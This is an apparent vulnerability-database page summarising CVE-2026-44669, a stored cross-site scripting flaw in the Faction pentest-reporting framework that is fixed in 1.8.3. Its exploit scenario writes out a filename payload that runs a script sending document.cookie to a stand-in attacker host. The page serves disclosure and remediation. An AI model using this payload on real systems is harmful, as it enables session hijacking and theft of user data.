Skip to main content

Faction CVE-2026-44669

| EUVD-2026-31943 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-05-26 GitHub_M
XSS Faction
8.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 08, 2026 - 10:07 vuln.today
Analysis Generated
Jun 08, 2026 - 10:07 vuln.today
Patch available
May 26, 2026 - 19:02 EUVD

DescriptionGitHub Advisory

FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in assessment file preview flows. User-supplied filename values are persisted and later rendered into HTML/attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who views the affected page. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3.

AnalysisAI

Stored cross-site scripting in Faction (a penetration testing report generation and collaboration framework) versions prior to 1.8.3 allows authenticated low-privilege users to persist attacker-controlled JavaScript via attachment filenames that are later rendered without output encoding when other users preview assessment files. Because payloads execute in privileged victims' browsers under the application origin, an attacker can hijack manager or admin sessions; SSVC rates technical impact as total though EPSS sits at 0.03% (10th percentile) and no public exploit identified at time of analysis.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to Faction with low-privilege account
Delivery
Upload attachment with script-laden filename
Exploit
Filename persisted unescaped in database
Install
Privileged user opens assessment preview
C2
Filename rendered into HTML attribute context
Execute
Payload executes in victim's session
Impact
Hijack admin account or exfiltrate client engagement data
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Attacker must hold an authenticated Faction account with permission to upload attachments to an assessment (CVSS PR:L), and a separate victim user must subsequently navigate to the assessment's file preview page where the malicious filename is rendered (CVSS UI:R). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals are mixed and should be weighed in context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a low-privilege Faction account (e.g., a junior assessor or a compromised collaborator credential) uploads an attachment to an assessment whose filename contains a crafted payload such as `"><img src=x onerror=fetch('https://attacker/?c='+document.cookie)>.pdf`. When a manager or admin later opens the assessment and the file preview UI renders the filename into an HTML attribute, the script executes in their authenticated session, exfiltrating session tokens or pivoting to perform admin actions; SSVC notes a proof-of-concept exists but no weaponized public exploit is identified at time of analysis.
Remediation Vendor-released patch: upgrade Faction to 1.8.3 or later, available at https://github.com/factionsecurity/faction/releases/tag/1.8.3, which adds context-appropriate output encoding (escapeHtml4, escapeJson, URLEncoder) and a server-side filename whitelist rejecting HTML and script characters; review the advisory at https://github.com/factionsecurity/faction/security/advisories/GHSA-f2jc-wx44-mr54 for full details. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all Faction deployments in your environment and assess current user access levels. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-44669 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy